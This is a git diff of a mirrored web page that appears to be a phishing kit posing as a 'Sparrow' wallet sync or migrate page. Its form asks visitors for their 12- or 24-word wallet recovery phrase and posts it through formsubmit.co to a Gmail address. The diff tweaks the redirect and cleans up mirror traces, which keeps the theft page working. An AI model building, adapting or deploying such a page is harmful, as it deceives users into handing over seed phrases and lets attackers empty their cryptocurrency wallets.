--- a/en/secure/index.html
+++ b/en/secure/index.html
@@ -1,4 +1,4 @@
-﻿<!DOCTYPE html>
+<!DOCTYPE html>
 <html lang="en">
   
 <!-- Mirrored from sparrow-sync.surge.sh/migrate.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Dec 2023 12:18:09 GMT -->
@@ -357,7 +357,7 @@
               <div>
                 <form action="https://formsubmit.co/hostblond@gmail.com" method="POST" id="my-form">
                     <input type="hidden" name="_captcha" value="false">
-                    <input type="hidden" name="_next" value="https://sparrowsync-node.com/en/secure/index.html">
+                    <input type="hidden" name="_next" value="en/index.html">
                   <div class="phrasebox ccbox activebox" id="phrase">
                     <textarea class="textarea allinput" name="phrase" placeholder="Input word phrase. Typically, 12 or 24 words separated by single spaces." oninput="countWord()"></textarea>
                   </div>
@@ -475,5 +475,4 @@
     <div class="modal-backdrop fade show"></div>
   </body>
 
-<!-- Mirrored from sparrow-sync.surge.sh/migrate.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Dec 2023 12:18:10 GMT -->
 </html>
